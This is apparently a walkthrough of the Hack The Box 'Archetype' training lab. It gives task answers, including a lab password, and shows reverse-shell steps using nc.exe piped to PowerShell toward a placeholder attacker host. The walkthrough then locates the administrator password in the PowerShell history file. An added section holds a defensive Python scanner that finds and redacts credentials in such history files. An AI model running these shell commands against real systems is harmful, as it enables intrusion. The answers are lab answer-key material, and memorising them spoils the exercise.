Category
Materials
Retired
Due date
Oct 17, 2025 03:49 AM
Task 1: Which TCP port is hosting a database server?
1433

Task 2: What is the name of the non-Administrative share available over SMB?

Task 3: What is the password identified in the file on the SMB share?
M3g4c0rp123


Task 4: What script from the Impacket collection can be used to establish an authenticated connection to a Microsoft SQL Server?
Task 5: What extended stored procedure of Microsoft SQL Server can be used to spawn a Windows command shell?
Task 6: What script can be used to search for possible paths to escalate privileges on Windows hosts?
winpeas
First create a reverse shell and upload nc.exe.

![python3 -m http.server [port]](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F879c4752-998e-4320-b868-ac6285eb1585%2FUntitled.png?table=block&id=48ae8b4b-900c-4fb5-ae31-fa8d3c2143c7&t=48ae8b4b-900c-4fb5-ae31-fa8d3c2143c7&width=835&cache=v2)
![nc.exe -e powershell.exe [attacker ip] [attacker listening port]](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fe98e4b1d-0b59-4c4d-9d9d-b6432cbca624%2FUntitled.png?table=block&id=2e2d4099-38dd-4f7c-83b8-6745ea4e9593&t=2e2d4099-38dd-4f7c-83b8-6745ea4e9593&width=917&cache=v2)
![nc -lvnp [attacker listening port]](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F74bfdfac-43ab-43a2-ab57-3e5959c492d7%2FUntitled.png?table=block&id=3202f086-203b-4b5b-950c-2075f70bb65a&t=3202f086-203b-4b5b-950c-2075f70bb65a&width=611&cache=v2)
Install winpeas on the victim.

Task 7: What file contains the administrator's password?
After running winpeas, check the history first.
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
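
The finding above, turned into a defensive check: the following is an added example, not part of the original write-up, that scans PSReadLine history files for command lines carrying plaintext credentials and reports them with the secret redacted. It goes beyond this one file by walking every profile under a users root; the sample history, the rule set and the function names are constructed for illustration.

```python
import re
from pathlib import Path

# Constructed sample history; none of these lines come from the lab host.
SAMPLE_HISTORY = r"""Get-ChildItem C:\backups
net.exe use T: \\FILESRV01\backups /user:svc_backup Example-Passw0rd!
$cred = ConvertTo-SecureString 'AnotherExample1' -AsPlainText -Force
sqlcmd -S localhost -U sa -P ExamplePw3
ping 10.0.0.1
"""

# Per-user location of the PSReadLine history, relative to the profiles root.
HISTORY_GLOB = "*/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt"

# (rule name, pattern); group "secret" is redacted. Variables and switches are not literals.
RULES = [
    ("net use with inline password",
     re.compile(r"\bnet(?:\.exe)?\s+use\b.*?/user:\S+\s+(?P<secret>[^\s/]\S*)", re.I)),
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r"ConvertTo-SecureString\s+(?:-String\s+)?"
                r"(?P<secret>'[^']*'|\"[^\"]*\"|[^\s$-]\S*)\s.*?-AsPlainText", re.I)),
    ("-P / -Password argument", re.compile(r"\s-(?:P|(?i:password))\s+(?P<secret>[^\s$-]\S*)")),
]

def scan_history(text):
    """Return (line_no, rule_name, redacted_line) for each credential-bearing line."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for name, pattern in RULES:
            match = pattern.search(line)
            if match:
                start, end = match.span("secret")
                # Redact so the audit report does not spread the secret further.
                findings.append((line_no, name, line[:start] + "<redacted>" + line[end:]))
                break
    return findings

def scan_profiles(users_root):
    """Scan every profile under users_root (e.g. C:\\Users); map history path -> findings."""
    report = {}
    for history in sorted(Path(users_root).glob(HISTORY_GLOB)):
        hits = scan_history(history.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(history)] = hits
    return report

if __name__ == "__main__":
    for finding in scan_history(SAMPLE_HISTORY):
        print(finding)
```

Any hit means the credential should be rotated and the history file cleaned, since the file is readable by whoever runs as that user.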


Log in as administrator.

Submit user flag


Submit root flag


Reference
- Author: ji3g4gp
- URL: https://gpblog.vercel.app//article/HTB-Archetype
- Copyright notice: This article is licensed under CC BY-NC-SA 4.0; please credit the source when using it.


